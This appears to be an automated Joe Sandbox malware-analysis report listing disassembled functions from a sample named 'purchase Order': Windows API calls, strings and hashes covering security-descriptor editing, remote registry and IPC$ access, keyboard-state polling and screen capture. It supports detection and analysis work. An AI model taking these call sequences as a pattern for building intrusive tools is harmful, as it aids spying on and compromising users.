Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E

Part of subcall function 00C7AC56: GetProcessHeap.KERNEL32(00000008,00C7A6B5,00000000,00000000,?,00C7A6B5,?), ref: 00C7AC62
Part of subcall function 00C7AC56: HeapAlloc.KERNEL32(00000000,?,00C7A6B5,?), ref: 00C7AC69
Part of subcall function 00C7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C7A6B5,?), ref: 00C7AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C7A8CB
_memset.LIBCMT ref: 00C7A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7A8FF
GetLengthSid.ADVAPI32(?), ref: 00C7A910
GetAce.ADVAPI32(?,00000000,?), ref: 00C7A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C7A969
GetLengthSid.ADVAPI32(?), ref: 00C7A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C7A995
HeapAlloc.KERNEL32(00000000), ref: 00C7A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C7A9BD
CopySid.ADVAPI32(00000000), ref: 00C7A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C7AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7AA2F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c92ce80cc387523d9bf418cd7510dfc0ee9a6e3aed215ba6757ca21284a957ab
Instruction ID: 269407ccd6e4705f375e189f922396bfbeb8728700dd6d7a4f6d8997db8ced1d
Opcode Fuzzy Hash: c92ce80cc387523d9bf418cd7510dfc0ee9a6e3aed215ba6757ca21284a957ab
Instruction Fuzzy Hash: 89513971900209ABDF10DF94DD85EEEBBB9FF44310F04C129F92AA6290DB359A16DB61

Function 00C99DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C99E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C99E42
CreateCompatibleDC.GDI32(?), ref: 00C99E4E
SelectObject.GDI32(00000000,?), ref: 00C99E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C99EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00C99EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C99F0F
SelectObject.GDI32(00000006,?), ref: 00C99F17
DeleteObject.GDI32(?), ref: 00C99F20
DeleteDC.GDI32(00000006), ref: 00C99F27
ReleaseDC.USER32(00000000,?), ref: 00C99F32

Strings

(, xrefs: 00C99ED7

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: c707d8880cf7eea2912ea0807a74ef85888a70ec872cf5aa74eda5f627f072ca
Instruction ID: 94d164e3aea6a3e11a7235f0ba4076741b2e5ea5207fd799f893e9d219dc1dbf
Opcode Fuzzy Hash: c707d8880cf7eea2912ea0807a74ef85888a70ec872cf5aa74eda5f627f072ca
Instruction Fuzzy Hash: CD512976900309AFCB15CFA9C889FAEBBB9EF48710F14842DF95A97250D731A941CB54

Function 00C8CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00C8CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00C8CCC5
__swprintf.LIBCMT ref: 00C8CD1E
__swprintf.LIBCMT ref: 00C8CD37
_wprintf.LIBCMT ref: 00C8CDED
_wprintf.LIBCMT ref: 00C8CE0B

Strings

^ ERROR, xrefs: 00C8CD8F
Error: , xrefs: 00C8CDB5
"%s" (%d) : ==> %s:%s%s, xrefs: 00C8CDE8
Line %d (File "%s"):, xrefs: 00C8CD18, 00C8CD31
"%s" (%d) : ==> %s:, xrefs: 00C8CE06

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 9ab14e0ae197b3e2a15fc9da21fd6000e73c9af7806cd01e06f7b57b0804e758
Instruction ID: 8dd23c9b6a8862d907ec0c459b04c9bd80eb23d91d447354cc2f9d3a2a52c90f
Opcode Fuzzy Hash: 9ab14e0ae197b3e2a15fc9da21fd6000e73c9af7806cd01e06f7b57b0804e758
Instruction Fuzzy Hash: 83515C72900249BBCB15FBA0CD86EEEB778BF08344F104166F515721A2EB316F59EB61

Function 00C8CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C8CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C8CAB0
__swprintf.LIBCMT ref: 00C8CB09
__swprintf.LIBCMT ref: 00C8CB22
_wprintf.LIBCMT ref: 00C8CBCD
_wprintf.LIBCMT ref: 00C8CBEB

Strings

^ ERROR , xrefs: 00C8CB64
Error: , xrefs: 00C8CB95
"%s" (%d) : ==> %s:%s%s, xrefs: 00C8CBC8
Line %d (File "%s"):, xrefs: 00C8CB03, 00C8CB1C
"%s" (%d) : ==> %s:, xrefs: 00C8CBE6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 3352a93b6d16dc30c6b24fedc6d9b1bdd9b781dbbd9dfcffac51bf9fa9ca1172
Instruction ID: 57a4c7242f3d38b5ffec1225dcb7f4ae3da873b0a9dc4e792095535e2eed0a08
Opcode Fuzzy Hash: 3352a93b6d16dc30c6b24fedc6d9b1bdd9b781dbbd9dfcffac51bf9fa9ca1172
Instruction Fuzzy Hash: FF516B32900649BBCB15FBA0CD86EEEB778BF04344F104065F506721A2EB716F59EB61

Function 00C8778F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C87794

Part of subcall function 00C5DC38: timeGetTime.WINMM(?,753DB400,00CB58AB), ref: 00C5DC3C

Sleep.KERNEL32(0000000A), ref: 00C877C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00C877E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00C87806
SetActiveWindow.USER32 ref: 00C87825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C87833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C87852
Sleep.KERNEL32(000000FA), ref: 00C8785D
IsWindow.USER32 ref: 00C87869
EndDialog.USER32(00000000), ref: 00C8787A

Strings

@U=u, xrefs: 00C87833, 00C87852
BUTTON, xrefs: 00C877F8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: 0597755db579116a812462902107f479b0dc5042a56ae5e680770a01f7a3e943
Instruction ID: bdad2a0f253409584af95c6f0f15e0ed5dafb3690b89faca469b775220cbeb65
Opcode Fuzzy Hash: 0597755db579116a812462902107f479b0dc5042a56ae5e680770a01f7a3e943
Instruction Fuzzy Hash: BC2106B0204705AFE7056B60EC99F2E3F6DFB44349B240234F51AD22A2EB719D55DB29

Function 00C855BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C855D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C85664
GetMenuItemCount.USER32(00D01708), ref: 00C856ED
DeleteMenu.USER32(00D01708,00000005,00000000,000000F5,?,?), ref: 00C8577D
DeleteMenu.USER32(00D01708,00000004,00000000), ref: 00C85785
DeleteMenu.USER32(00D01708,00000006,00000000), ref: 00C8578D
DeleteMenu.USER32(00D01708,00000003,00000000), ref: 00C85795
GetMenuItemCount.USER32(00D01708), ref: 00C8579D
SetMenuItemInfoW.USER32(00D01708,00000004,00000000,00000030), ref: 00C857D3
GetCursorPos.USER32(?), ref: 00C857DD
SetForegroundWindow.USER32(00000000), ref: 00C857E6
TrackPopupMenuEx.USER32(00D01708,00000000,?,00000000,00000000,00000000), ref: 00C857F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C85805

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 47dc6fc6838aa7f456f4c5fa3fe2f91dc176f9797167ad7f41bc7001b4274a42
Instruction ID: aeb758c98a94132cded1da3ec3ba35ba47b223f66059d701b26fd5c0ebc63c91
Opcode Fuzzy Hash: 47dc6fc6838aa7f456f4c5fa3fe2f91dc176f9797167ad7f41bc7001b4274a42
Instruction Fuzzy Hash: CE710470640605BFEB25AF15CC49FAABF65FF0036CF244216F6296A2D0D7B06C10DB98

Function 00C7A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C7A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C7A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C7A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C7A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C7A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7A2AB

Strings

\IPC$, xrefs: 00C7A1F3
SOFTWARE\Classes\, xrefs: 00C7A17D
\CLSID, xrefs: 00C7A193

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: ed7511c95281e3d51d8f8124d021e206d86b3f863b162441cbb1909cd0a84a01
Instruction ID: 8150b76caf6940b8ef7b31585b25c5fdcba4cbeb08f2d1aa747eb1cee3750771
Opcode Fuzzy Hash: ed7511c95281e3d51d8f8124d021e206d86b3f863b162441cbb1909cd0a84a01
Instruction Fuzzy Hash: 7641E576C10229ABDF21EBA4DC85EEEB7B8FF04340F004129E916B31A1EB709E05DB51

Function 00CA3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D

Strings

HKEY_CURRENT_USER, xrefs: 00CA3CE2
HKEY_CLASSES_ROOT, xrefs: 00CA3C96
HKU, xrefs: 00CA3D15
HKCC, xrefs: 00CA3CD1
HKEY_LOCAL_MACHINE, xrefs: 00CA3C6C
HKEY_USERS, xrefs: 00CA3D04
HKCR, xrefs: 00CA3CAB
HKEY_CURRENT_CONFIG, xrefs: 00CA3CC0
HKLM, xrefs: 00CA3C81
HKCU, xrefs: 00CA3CF3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 5b0b9248550a8506c1b5d8cddef1fc7ea5a0de929c4bf62fa5342d6a952e8dd2
Instruction ID: 4307bcd96a523ba64691ef794530276c3d01d15c88c9948268df35ab6546784c
Opcode Fuzzy Hash: 5b0b9248550a8506c1b5d8cddef1fc7ea5a0de929c4bf62fa5342d6a952e8dd2
Instruction Fuzzy Hash: 6A414F7452028A8BCF08EF14D861AEB3365BF12348F104855FCA55B292EB70EF4ADB61

Function 00CAA1B6 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CAA259
CreateCompatibleDC.GDI32(00000000), ref: 00CAA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CAA273
SelectObject.GDI32(00000000,00000000), ref: 00CAA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00CAA286
DeleteDC.GDI32(00000000), ref: 00CAA28F
GetWindowLongW.USER32(?,000000EC), ref: 00CAA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CAA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CAA2B9

Strings

@U=u, xrefs: 00CAA273
static, xrefs: 00CAA1F1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: f908eafd97bf315f7150793ec6572790432e6d446c435f97389805c4ce414a87
Instruction ID: 5abb57c3312b173ea6fc7943203edef0a14d1c369908840291f79f18c21d632b
Opcode Fuzzy Hash: f908eafd97bf315f7150793ec6572790432e6d446c435f97389805c4ce414a87
Instruction Fuzzy Hash: DE316131100216BBDF119F64DC49FEE3B69FF0A364F110324FA2AA61A0C735D821DBA5

Function 00C825B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CB36F4,00000010,?,Bad directive syntax error,00CDDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C825D6
LoadStringW.USER32(00000000,?,00CB36F4,00000010), ref: 00C825DD
_wprintf.LIBCMT ref: 00C82610
__swprintf.LIBCMT ref: 00C82632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C826A1

Strings

., xrefs: 00C82687
Line %d:, xrefs: 00C8262C
Line %d (File "%s"):, xrefs: 00C82647
Error: , xrefs: 00C8266F
%s (%d) : ==> %s.: %s %s, xrefs: 00C8260B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: c9b0e8a3ca4c12cd58f67b6ffbf9b4d493b006807be9cf28c7182e20a15d992f
Instruction ID: feb0794f6c161fa58c52e6659c2b9080791dc346af7c8dbae2d8999c173ecff0
Opcode Fuzzy Hash: c9b0e8a3ca4c12cd58f67b6ffbf9b4d493b006807be9cf28c7182e20a15d992f
Instruction Fuzzy Hash: 08212B3190025EBFCF11BB90CC4AFEE7B79BF18308F044465F616660A3EA71A619EB51

Function 00C87AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C87B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C87B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C87B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C87B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C87B8C

Strings

play PlayMe wait, xrefs: 00C87B76
alias PlayMe, xrefs: 00C87B1B
status PlayMe mode, xrefs: 00C87B3D
open , xrefs: 00C87AF1
play PlayMe, xrefs: 00C87B87
close PlayMe, xrefs: 00C87B53, 00C87B80

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 0a4a6928616559debed7a87481f5537d5211173a86b2257411521a8d9d1cd5b3
Instruction ID: 035af1fd97a8494420651b3c6d6029d64e005a381627526abf47f0c1d87d8a25
Opcode Fuzzy Hash: 0a4a6928616559debed7a87481f5537d5211173a86b2257411521a8d9d1cd5b3
Instruction Fuzzy Hash: 4C11C4A06402AD7AD760B361CC8ADFFBA7CEB91B00F10052AB511A20D1EA705A49C6B1

Function 00CBDD4A Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C5B496
SetTextColor.GDI32(?,000000FF), ref: 00C5B4A0
SetBkMode.GDI32(?,00000001), ref: 00C5B4B5
GetStockObject.GDI32(00000005), ref: 00C5B4BD
GetClientRect.USER32(?), ref: 00CBDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 00CBDD7A
GetWindowDC.USER32(?), ref: 00CBDD86
GetPixel.GDI32(00000000,?,?), ref: 00CBDD95
ReleaseDC.USER32(?,00000000), ref: 00CBDDA7
GetSysColor.USER32(00000005), ref: 00CBDDC5

Strings

@U=u, xrefs: 00CBDD7A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID: @U=u
API String ID: 3430376129-2594219639
Opcode ID: 657f48a06a82372926139f879f9b7decf5edcd486f52040af1a470bbd89e22e0
Instruction ID: 701415b9434545c0e97c27493415a129a21e3335d42edc55fd95097d20c6fc38
Opcode Fuzzy Hash: 657f48a06a82372926139f879f9b7decf5edcd486f52040af1a470bbd89e22e0
Instruction Fuzzy Hash: AE114975500205AFDB216BB4EC08FED7FA1EB05326F148675FA67A50E2DB314A82DB21

Function 00C902EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

CoInitialize.OLE32(00000000), ref: 00C9034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C903DE
SHGetDesktopFolder.SHELL32(?), ref: 00C903F2
CoCreateInstance.OLE32(00CCDA8C,00000000,00000001,00CF3CF8,?), ref: 00C9043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C904AD
CoTaskMemFree.OLE32(?,?), ref: 00C90505
_memset.LIBCMT ref: 00C90542
SHBrowseForFolderW.SHELL32(?), ref: 00C9057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C905A1
CoTaskMemFree.OLE32(00000000), ref: 00C905A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C905DF
CoUninitialize.OLE32(00000001,00000000), ref: 00C905E1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: ffe3d455a4c609bb630fc389e88925cccf667e0f222e3eca6be34b376c0ae9ae
Instruction ID: e7157d14b164c3600c50d516b497be2d60f0afd95eac4d8c936592198a3c0a50
Opcode Fuzzy Hash: ffe3d455a4c609bb630fc389e88925cccf667e0f222e3eca6be34b376c0ae9ae
Instruction Fuzzy Hash: F0B1FC75A00108AFDB14DFA4C888EAEBBB9FF48304B158469F916EB261D770EE41DF54

Function 00C82E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C82ED6
SetKeyboardState.USER32(?), ref: 00C82F41
GetAsyncKeyState.USER32(000000A0), ref: 00C82F61
GetKeyState.USER32(000000A0), ref: 00C82F78
GetAsyncKeyState.USER32(000000A1), ref: 00C82FA7
GetKeyState.USER32(000000A1), ref: 00C82FB8
